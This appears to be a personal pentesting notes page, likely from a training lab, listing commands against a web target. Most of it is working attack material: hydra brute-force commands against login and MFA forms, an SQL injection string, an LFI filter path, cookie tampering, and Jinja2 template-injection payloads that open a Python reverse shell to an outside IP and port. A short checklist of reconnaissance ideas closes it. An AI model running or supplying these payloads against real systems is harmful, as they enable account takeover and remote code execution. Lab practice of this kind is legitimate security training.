random notes

some random notes and cmds

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://ozone-energy.bitnet

a

nmap -sV -p80 ozone-energy.bitnet

wapiti -u http://ozone-energy.bitnet -m all

dirb http://ozone-energy.bitnet /usr/share/wordlists/custom/ozone-wordlist.txt.

" or "1"="1

hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/[LOGINPAGE]:username=^USER^&password=^PASS^&Login=Login:Invalid Password"

hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Username or Password"

{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}

{{5*'5'}}

dirb http://10.102.9.99 /usr/share/wordlists/custom/ozone-wordlist.txt

hydra -l admin -P /usr/share/wordlists/custom/ozone-wordlist.txt 10.102.9.99 http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Password"

{{ for x in ().class.base.subclasses() %}

{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.102.7.0\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}{% endfor }}

php://filter/convert.base64-encode/resource=/token.txt

echo 'bGludXhoaW50LmNvbQo=' | base64 --decode

GET /auth?user=YWRtaW4%3D&token=dHJ1ZQ%3D%3D&rememberMe=False HTTP/1.1

hydra -l admin -P /home/kali/generate.txt 10.102.11.237 http-form-post "/prompt:mfa_token=^password&Login=Login:Invalid token, please try again."

hydra -l admin -P /home/kali/Downloads/list3.txt 10.102.11.237 http-form-post "/prompt:username=^USER^&mfa_token=^PASS^&Login=Login:Invalid token, please try again."

i=0 while [ "$i" -le 9999 ]; do printf '%04d\n' "$i" i=$(( i + 1 )) done

Look at the host, not just the webapp identify the web server platform is there admin portals? Look for dangerouse http methods - PUT, COPY, DELETE, TRACE are they vulnerable to directy traversal, shellshock use nmap to check ports

PreviousIMNextCurl

Last updated

Was this helpful?